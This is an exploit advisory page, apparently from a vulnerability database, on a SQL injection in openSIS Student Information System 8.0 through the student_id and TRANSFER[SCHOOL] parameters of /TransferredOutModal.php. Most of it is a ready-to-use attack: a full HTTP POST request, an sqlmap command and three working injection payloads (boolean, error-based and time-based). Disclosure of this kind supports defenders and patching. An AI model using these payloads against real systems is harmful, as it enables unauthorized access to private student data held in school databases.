openSIS Student Information System 8.0 SQL Injection

Risk: Medium
Local: No
Remote: Yes

# Exploit Title: openSIS Student Information System 8.0 - 'multiple' SQL Injection # Date: 26/12/2021 # Exploit Author: # Author Mail: hello[AT] # Vendor Homepage: # Software Link: # Version: 8.0 Community Edition # Tested on: Linux/Windows # Researchers : Security For Everyone Team - ''' DESCRIPTION A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v8.0 via the "student_id" and "TRANSFER{SCHOOL]" parameters in POST request sent to /TransferredOutModal.php. The vulnerability is found in the "student_id" and "TRANSFER{SCHOOL]" parameters in POST request sent to page /TransferredOutModal.php. Example: POST /TransferredOutModal.php?modfunc=detail Post Data: student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5 if an attacker exploits this vulnerability, attacker may access private data in the database system. EXPLOITATION POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 Host: localhost User-Agent: user-agent Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: cookie Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 69 student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5 Example sqlmap Command: -r request.txt --level 5 --risk 3 -p student_id --random-agent --dbs Example Payloads: Payload1: student_id=(SELECT (CASE WHEN (2108=2108) THEN 1 ELSE (SELECT 5728 UNION SELECT 5943) END))&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 Payload2: student_id=1 AND (SELECT 5604 FROM(SELECT COUNT(*),CONCAT(0x7162766a71,(SELECT (ELT(5604=5604,1))),0x717a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 Payload3: student_id=1 AND (SELECT 6111 FROM (SELECT(SLEEP(5)))JtuC)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 ABOUT SECURITY FOR EVERYONE TEAM We are a team that has been working on cyber security in the industry for a long time. In 2020, we created where everyone can test their website security and get help to fix their vulnerabilities. We have many free tools that you can use here: '''

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top